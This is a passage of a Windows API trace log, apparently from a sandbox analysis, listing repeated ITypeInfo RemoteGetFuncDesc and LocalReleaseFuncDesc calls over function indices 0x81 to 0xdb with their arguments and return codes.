0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.220] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.220] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.221] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.221] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.222] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.222] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] 